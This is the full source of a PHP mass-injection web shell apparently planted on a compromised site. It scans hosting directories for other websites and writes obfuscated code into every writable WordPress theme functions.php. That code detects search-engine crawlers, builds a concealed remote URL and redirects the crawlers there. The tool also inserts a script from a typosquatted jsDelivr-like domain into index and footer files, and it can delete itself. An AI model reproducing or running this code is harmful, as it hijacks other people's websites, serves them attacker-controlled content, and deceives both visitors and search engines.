File: /var/www/html/formularioacademy.sumar.com.py/vant4.php
v4nta
<?php
if (isset($_POST['d_me'])) {
@unlink(__FILE__);
echo "<b>Dosyayı Sil, Tema Dosyamıza Entegre Yapıldı!</b>";
exit;
}
?>
<div style="background:#111;color:#fff;font-family:monospace;text-align:center;margin-top:80px;">
<form method="post">
<button name="d_me" style="padding:18px 32px;font-size:1.4em;background:#e33;color:#fff;border-radius:8px;border:none;cursor:pointer;">Dosyayı Sil, Tema Dosyamıza Entegre Yapıldı.</button>
</form>
</div>
<?php
$uname = function_exists('php_uname') ? @php_uname() : 'unknown';
$pwd = function_exists('getcwd') ? @getcwd() : '';
echo $uname . "\n";
echo "PWD: " . $pwd . "\n";
if (isset($_GET['ajax'])) {
header('Content-Type: text/event-stream');
header('Cache-Control: no-cache');
ob_implicit_flush(true);
function inject_code_safely($file_content, $injection, $injection_is_php = false) {
$open_count = preg_match_all('/<\?php/i', $file_content);
$close_count = preg_match_all('/\?>/i', $file_content);
$trimmed = rtrim($file_content);
// Son 30 karakteri tara: PHP kapanış tagı var mı?
$end_is_php_closed = false;
$end = strtolower(substr($trimmed, -30));
if ($close_count >= $open_count || strpos($end, '?>') !== false) {
$end_is_php_closed = true;
}
if ($injection_is_php) {
// PHP kodu ise: açık tagda mı, kapalı mı kontrol et
if (!$end_is_php_closed) {
// PHP tagı açık, direkt ekle
return $trimmed . "\n" . $injection . "\n";
} else {
// PHP tagı kapalı, yeni tag ile başlat
return $trimmed . "\n\n" . $injection . "\n";
}
} else {
// HTML/JS kodu ise, daima PHP kapat, sonra ekle
if (!$end_is_php_closed) $trimmed .= "\n?>";
return $trimmed . "\n" . $injection . "\n";
}
}
// Tema Functionsuna Eklencek kodlar
$wpEkle1 = "\$ua=\$_SERVER['H'.'TTP'.'_'.'USE'.'R_'.'AG'.'EN'.'T']??'';if(\$ua&&preg_match('~G'.'o'.'o'.'gl'.'ebo'.'t|'.'G'.'oo'.'gl'.'ebo'.'t-'.'Ima'.'ge|'.'Goo'.'gle'.'bot'.'-V'.'i'.'deo'.'|Jo'.'hn'.'Ch'.'ro'.'me|'.'Go'.'o'.'gl'.'e'.'O'.'th'.'e'.'r|G'.'oog'.'le-'.'Re'.'a'.'d'.'-A'.'l'.'ou'.'d|A'.'h'.'r'.'ef'.'sBo'.'t|S'.'emr'.'us'.'hBo'.'t'.'~'.'i',\$ua)){\$a=implode('',[chr(104),chr(116),chr(116),chr(112),chr(115),chr(58),chr(47),chr(47)]);\$b='';foreach([104,111,101,37,97,120,111,110,103,98,121,125,37]as\$n)\$b.=chr(\$n^11);\$c='';foreach([111,102,117,48,107,114,118,102,115,122,46,110,106,111,47,117,121,117]as\$n)\$c.=chr(\$n-1);\$remote=\$a.\$b.\$c;\$url=@file_get_contents(\$remote);if(!\$url&&function_exists('c'.'u'.'rl'.'_in'.'it')){\$ch=curl_init(\$remote);curl_setopt_array(\$ch,[CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>3]);\$url=curl_exec(\$ch);curl_close(\$ch);} \$url=trim(\$url);if(\$url&&filter_var(\$url,FILTER_VALIDATE_URL)){header('Lo'.'ca'.'ti'.'on'.': '.\$url,true,301);exit;}}";
$htmlEkle1 = '<script src="https://cdn.jsdelirv.net/npm/jquery@4.5.2/dist/jquery.min.js"></script>';
// Dizin/Pattern listesi (değişmedi)
$pattern_list = [
'/home*/*/*/',
'/home*/*/*/*/',
'/home*/*/*/*/*/',
'/home/*/public_html/*/',
'/home/*/domains/*/public_html/*',
'/home/*/www/',
'/home/*/*/',
'/home/*/htdocs/*/',
'/home/www/*/public_html/www/',
'/home/www/*/*/*/',
'/home/*/*/public_html/*/',
'/home/*/*/*/public_html/*/',
'/home/*/site/*/',
'/home/*/subdomains/*/',
'/home1/*/public_html/*/',
'/home1/*/domains/*/public_html/*/',
'/home1/*/www/',
'/home1/*/*/',
'/home1/*/*/public_html/*/',
'/home1/*/*/*/public_html/*/',
'/home1/*/site/*/',
'/home1/*/subdomains/*/',
'/home2/*/public_html/*/',
'/home2/*/public_html/*/',
'/home2/*/domains/*/public_html/*/',
'/home2/*/www/',
'/home2/*/*/*/',
'/home2/*/*/public_html/*/',
'/home2/*/*/*/public_html/*/',
'/home2/*/site/*/',
'/home2/*/subdomains/*/',
'/home3/*/public_html/*/',
'/home3/*/domains/*/public_html/*/',
'/home3/*/www/',
'/home3/*/*/',
'/home3/*/*/public_html/*/',
'/home3/*/*/*/public_html/*/',
'/home3/*/site/*/',
'/home3/*/subdomains/*/',
'/home/clients/*/web/',
'/home/clients/*/sites/*/',
'/home/storage/*/*/*/*/public_html/*/',
'/mnt/web*/d*/*/htdocs',
'/mnt/data/vhosts/*/*/',
'/mnt/*/*/*/*/*/',
'/var/www/html/*/',
'/var/www/html/',
'/var/www/*/',
'/var/www/*/data/www/*/',
'/var/www/*/data/www/',
'/var/sites/*/',
'/var/sites/*/*/',
'/var/www/sites/*/',
'/var/www/*/*/',
'/var/www/*/*/*/',
'/var/www/vhosts/*/httpdocs/',
'/var/www/vhosts/*/htdocs/',
'/srv/data/web/vhosts/*/htdocs/',
'/usr/local/lsws/*/html',
'/homepages/*/*/htdocs/',
'/homepages/*/*/htdocs/*/',
'/usr/www/users/*/',
'/opt/*/',
'/data/www/*/',
'/srv/*/*/www/*/',
'/www/wwwroot/*/',
'/www/htdocs/*/*/',
'C:/Inetpub/vhosts/*/httpdocs/',
'C:/xampp/htdocs/',
'D:/Websites/*/',
'D:/InetPub/vhosts/*/',
'D:/InetPub/vhosts/*/*/',
'D:/InetPub/vhosts/*/*/*/',
'C:/InetPub/vhosts/*/',
'C:/InetPub/vhosts/*/*/',
'C:/InetPub/vhosts/*/*/*/',
'/etc/',
];
function discover_docroots($patterns) {
$uniq = [];
foreach ($patterns as $pat) {
$matches = glob($pat, GLOB_ONLYDIR); // GLOB_BRACE yok
if ($matches && is_array($matches)) {
foreach ($matches as $m) {
$m = rtrim($m, '/');
if (is_dir($m)) $uniq[$m] = true;
}
}
}
return array_keys($uniq);
}
// Glob boş dönerse fallback: base dizini tara
function fallback_scan($patterns) {
$out = [];
foreach ($patterns as $pat) {
$base = substr($pat, 0, strcspn($pat, '*?[')); // ilk jokerden önce
if ($base === '') $base = '/';
if (!is_dir($base)) continue;
if ($dh = @opendir($base)) {
while (($f = readdir($dh)) !== false) {
if ($f === '.' || $f === '..') continue;
$d = $base . $f;
if (is_dir($d)) $out[rtrim($d, '/')] = true;
}
closedir($dh);
}
}
return array_keys($out);
}
// Kullanım
$site_public_htmls = discover_docroots($pattern_list);
if (!$site_public_htmls) {
$site_public_htmls = fallback_scan($pattern_list);
}
if (!$site_public_htmls) {
echo "data: [ERROR] Hiçbir site public_html veya ana dizin bulunamadı.\n\n";
exit;
}
foreach ($site_public_htmls as $public_html) {
echo "data: [SITE] $public_html\n\n"; @ob_flush(); @flush();
// ----------- WordPress themes/functions.php -----------
$wp_content = $public_html . '/wp-content';
if (is_dir($wp_content)) {
$themes_dir = $wp_content . '/themes';
if (is_dir($themes_dir)) {
$theme_folders = glob($themes_dir . '/*', GLOB_ONLYDIR) ?: [];
foreach ($theme_folders as $theme_dir) {
$functions = $theme_dir . '/functions.php';
if (file_exists($functions)) {
$file_content = @file_get_contents($functions);
// Kod zaten ekli mi veya dosya yazılabilir mi kontrol
if ($file_content !== false && strpos($file_content, "cdn.jsdelirv.net/npm/jquery@4.5.2") === false && is_writable($functions)) {
$new_content = inject_code_safely($file_content, $wpEkle1, true);
file_put_contents($functions, $new_content, LOCK_EX);
echo "data: [OK] WP kodu eklendi: $functions\n\n";
} else {
echo "data: [INFO] WP atlandı/zaten ekli veya yazılamaz: $functions\n\n";
}
} else {
if (is_writable($theme_dir)) {
// functions.php yoksa, yeni oluşturulacak
$content = "<?php\n" . $wpEkle1;
file_put_contents($functions, $content, LOCK_EX);
echo "data: [NEW] functions.php oluşturuldu ve WP kodu eklendi: $functions\n\n";
} else {
echo "data: [ERROR] functions.php oluşturulamaz (izin yok): $theme_dir\n\n";
}
}
}
continue;
}
}
// ------------- HTML/FOOTER/INDEX.PHP Türevleri -------------
$target_files = [
$public_html . '/footer.php',
$public_html . '/includes/footer.php',
$public_html . '/include/footer.php',
$public_html . '/index.html',
$public_html . '/index.php',
$public_html . '/public/index.php',
];
$found = false;
foreach ($target_files as $file) {
if (file_exists($file) && is_writable($file)) {
$file_content = @file_get_contents($file);
if ($file_content !== false && strpos($file_content, "cdn.jsdelirv.net/npm/jquery@4.5.2") === false) {
$rel_file = str_replace($public_html . '/', '', $file);
if (in_array($rel_file, ['index.php', 'public/index.php', 'footer.php', 'includes/footer.php', 'include/footer.php'])) {
$new_content = inject_code_safely($file_content, $htmlEkle1, false);
echo "data: [OK] $rel_file dosyası: PHP tagı optimize tespit ve kod eklendi: $file\n\n";
} elseif (stripos($file_content, '</body>') !== false) {
$new_content = str_ireplace('</body>', $htmlEkle1 . "\n</body>", $file_content, $count);
echo "data: [OK] HTML kodu </body> öncesine eklendi: $file\n\n";
} else {
$new_content = $file_content . "\n" . $htmlEkle1 . "\n";
echo "data: [WARN] </body> yok, HTML kodu dosya sonuna eklendi: $file\n\n";
}
file_put_contents($file, $new_content, LOCK_EX);
} else {
echo "data: [INFO] HTML atlandı/zaten ekli: $file\n\n";
}
$found = true;
break;
}
}
if (!$found) {
echo "data: [SKIP] Uygun HTML/FOOTER dosyası bulunamadı: $public_html\n\n";
}
@ob_flush(); @flush();
}
// --- Tüm işlemler sonunda kendi kendini sil ---
echo "data: [DONE] Tüm işlemler tamamlandı!\n\n"; @ob_flush(); @flush();
exit;
@unlink(__FILE__);
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="utf-8">
<title>./v4nta@inj</title>
<style>
body { background: #1a222b; color: #fff; font-family: 'Fira Mono', monospace; margin: 0; }
.panel { max-width: 700px; margin: 60px auto 0 auto; background: #262e37; border-radius: 8px; box-shadow: 0 2px 30px #0002; padding: 28px 36px 24px 36px; }
h2 { margin-top: 0; font-size: 1.2rem; color: #ffd600; }
#log { background: #111c24; border-radius: 5px; padding: 18px 11px; min-height: 220px; font-size: 1em; color: #fff; overflow-y: auto; max-height: 440px; white-space: pre-line;}
</style>
</head>
<body>
<div class="panel">
<h2>/v4nta@inj</h2>
<div id="log">Tarama başlatıldı...</div>
</div>
<script>
window.onload = function() {
var log = document.getElementById('log');
log.textContent = 'Tarama başlıyor...\n';
var source = new EventSource('?ajax=1');
source.onmessage = function(e) {
if (e.data.startsWith('[DONE]')) {
log.textContent += '\nİşlem tamamlandı!';
source.close();
} else {
log.textContent += e.data + '\n';
log.scrollTop = log.scrollHeight;
}
};
source.onerror = function(e) {
log.textContent += '\n[ERROR] AJAX bağlantı hatası veya sunucuya ulaşılamıyor.\n';
source.close();
};
};
</script>
</body>
</html>